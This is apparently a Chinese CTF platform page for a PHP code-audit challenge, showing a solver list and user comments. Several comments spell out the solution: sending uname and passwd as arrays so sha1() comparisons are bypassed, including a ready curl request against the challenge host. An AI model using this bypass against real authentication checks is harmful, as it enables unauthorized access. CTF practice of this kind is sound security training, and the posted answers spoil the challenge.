评分(4)
解题动态
不会Reverse的玖 攻破了该题 1小时前
baixiaobaiqwq 攻破了该题 1小时前
auroraSEA 攻破了该题 1小时前
HARUMIZU 攻破了该题 1天前
Sonetto 攻破了该题 1天前
零零凌ling 攻破了该题 1天前
hyj11125 攻破了该题 1天前
yansuochitangliu 攻破了该题 1天前
ethicalpaws 攻破了该题 1天前
Ash_1070 攻破了该题 2天前
violet06 攻破了该题 2天前
yuesheng#1 攻破了该题 2天前
sqwq 攻破了该题 2天前
cainiao看简介 攻破了该题 3天前
记得开心一点 攻破了该题 3天前
加菲猫 攻破了该题 3天前
权汁味 攻破了该题 4天前
咕噜灵波 攻破了该题 4天前
AzKanna 攻破了该题 4天前
评论
wywsssf 7月前
举报
链接后面加?uname[]=1&id=margin,同时POST中passwd[]=2
ctfer-pls 8月前
举报
GET:id=margin&uname[]=111a POST:passwd[]=2bba
2686213396 8月前
举报
flag{*********}
2686213396 8月前
举报
我喜欢hackbar这个插件(POST方法的最优选择),相当于帮你写好请求头格式的bp,只需要填写上传的参数即可,本题思路,直接url传参uname和id,通过数组实现绕过,再由hackbarPOSTpasswd的参数,获得flag,这道题目的核心依旧是代码审计
iNMB 8月前
举报
很奇怪bp不行,用其他方法可以不知道为什么
SLfanCTF 8月前
举报
数组sha1为空,传入数组绕过
zhuizhui 8月前
举报
POST /?id=margin&uname[]=1 passwd[]=11 数组绕过sha-1
ahsjezyt 8月前
举报
flag{********}
奕生 9月前
举报
bp可以,就是要把GET请求改成POST请求
xlogsrc 9月前
举报
curl -X POST "http://117.72.52.127:11657/?uname[]=a&id=margin" -d "passwd[]=b"